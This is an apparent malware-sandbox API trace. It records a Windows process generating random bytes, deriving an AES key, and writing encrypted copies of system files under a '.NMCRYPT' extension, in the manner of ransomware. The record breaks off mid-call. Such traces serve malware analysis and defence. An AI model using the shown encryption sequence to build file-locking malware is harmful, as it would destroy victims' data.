[0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.636] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.637] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.638] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0152.639] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0152.640] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0152.640] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0152.640] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0152.640] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad178) returned 1 [0152.640] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0152.640] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0152.640] wcslen (_String="\\\\?\\") returned 0x4 [0152.640] CryptDuplicateKey (in: hKey=0x9ad178, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2f8) returned 1 [0152.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0152.641] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\en-US\\micaut.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\micaut.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0152.641] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=9728) returned 1 [0152.641] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, 